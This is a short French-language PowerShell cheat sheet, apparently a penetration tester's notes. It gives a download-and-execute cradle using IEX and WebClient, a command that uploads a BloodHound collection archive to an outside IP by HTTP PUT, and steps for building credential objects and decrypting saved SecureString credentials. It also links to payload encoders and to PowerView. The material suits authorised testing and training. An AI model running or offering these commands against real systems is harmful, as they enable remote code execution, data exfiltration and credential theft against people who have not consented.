Powershell
Téléchargement et exécution d’un script
IEX(New-Object Net.WebClient).downloadString('<URL>')Upload de fichier
Invoke-WebRequest -uri http://192.168.45.153:8000/export.zip -Method PUT -Infile 20240811103448_BloodHound.zipCréation d’un objet Credential
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)Déchiffrement d’une SecureString
Si les éléments de connexion sont sauvegardés dans un fichier, il est possible d’utiliser la commande Import-CliXml:
$cred = Import-CliXml -Path <DumpCreds>; $cred.GetNetworkCredential() | Format-ListDans le cas d’une chaine de caractère simple:
$user = '<USERNAME>'
$pass = "<SECURESTRING>" | convertto-securestring
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential() | Format-ListEncoding de payload
- https://github.com/plackyhacker/ps-encoder
- https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py
PowerView
Ressources: https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview